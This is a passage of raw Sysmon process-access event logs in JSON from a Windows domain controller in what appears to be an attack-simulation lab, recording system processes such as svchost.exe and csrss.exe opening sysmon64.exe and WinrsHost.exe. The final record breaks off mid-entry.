{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4476,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010F4B40600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4477,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4478,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4479,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4480,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4481,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4482,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4483,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4484,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 